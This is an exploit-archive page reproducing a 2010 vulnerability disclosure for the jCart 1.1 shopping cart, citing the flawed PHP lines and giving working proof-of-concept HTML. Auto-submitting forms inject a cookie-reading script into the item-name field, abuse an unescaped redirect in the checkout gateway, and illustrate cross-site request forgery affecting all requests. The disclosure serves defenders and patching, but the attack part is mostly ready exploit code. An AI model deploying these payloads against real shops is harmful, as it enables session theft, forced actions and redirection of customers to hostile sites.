jCart 1.1 Cross Site Request Forgery / Cross Site Scripting

jCart 1.1 Cross Site Request Forgery / Cross Site Scripting: Posted Oct 1, 2010; Authored by p0deje; jCart version 1.1 suffers from cross site request forgery, cross site scripting and open redirect vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | 37d8fb41ceb0f28568a4e8cc0862efe009e1edaa1362ee88731eee816d27916e; Download | Favorite | View

jCart 1.1 Cross Site Request Forgery / Cross Site Scripting

<!--
     Exploit Title: jCart v1.1 Multiple XSS/CSRF/Open Redirect Vulnerabilities
     Date: 25.07.2010
     Author: p0deje
     Software Link: http://conceptlogic.com/jcart/
     Version: <=1.1
     Tested on: OS Independent
     CVE : --
-->
 
<!-- 1. Cross-site Scripting -->
 
<!-- 
      Vulnerable code snippet:
      jcart.php
      -------------------------
      line 251:        $item_name = $_POST[$item_name];
      ...
      line 256:        $item_added = $this->add_item($item_id, $item_qty, $item_price, $item_name);
      -------------------------
 
      User-supplied input for variable $item_name isn't properly escaped.
 
      Proof-of-Concept:
-->
      <html>
        <form action="http://evil.host/jcart-1.1/jcart/jcart-relay.php" method="POST">
          <input name="my-item-id" value="3" type="hidden">
          <input name="my-item-qty" value="1" type="hidden">
          <input name="my-item-name" value="<script>alert(document.cookie)</script>" type="hidden">
          <input name="my-item-price" value="33.25" type="hidden">
          <input id="payload" name="my-add-button" value="add to cart" class="button" type="submit">
          </form>
          <script>
            document.getElementById('payload').click()
        </script>
      </html>
 
<!--  2. Cross-site Scripting / Open Redirect -->
 
<!--
      Vulnerable code snippet
      jcart-gateway.php:
      -------------------------
      line 41:    header('Location: ' . $_POST['jcart_checkout_page']);
      -------------------------
 
      User-supplied data is not properly escaped before passing to header() function.
 
      Proof-of-Concept:
-->
      <html>
        <form action="http://evil.host/jcart-1.1/jcart/jcart-gateway.php" method="POST">
          <input name="jcart_checkout_page" value="http://www.google.com" type="hidden">
          <input id="payload" name="my-add-button" value="add to cart" class="button" type="submit">
          </form>
          <script>
            document.getElementById('payload').click()
        </script>
      </html>
 
<!--  3. Cross-site Request Forgery -->
 
<!--
      All requests of jCart are vulnerable to CSRF.
      Proof-of-Concept goes the same as for the first or the second vulnerability.
-->

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 63 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
kai6u 3 files
gabe_k 3 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

jCart 1.1 Cross Site Request Forgery / Cross Site Scripting

jCart 1.1 Cross Site Request Forgery / Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

jCart 1.1 Cross Site Request Forgery / Cross Site Scripting

Share This

jCart 1.1 Cross Site Request Forgery / Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems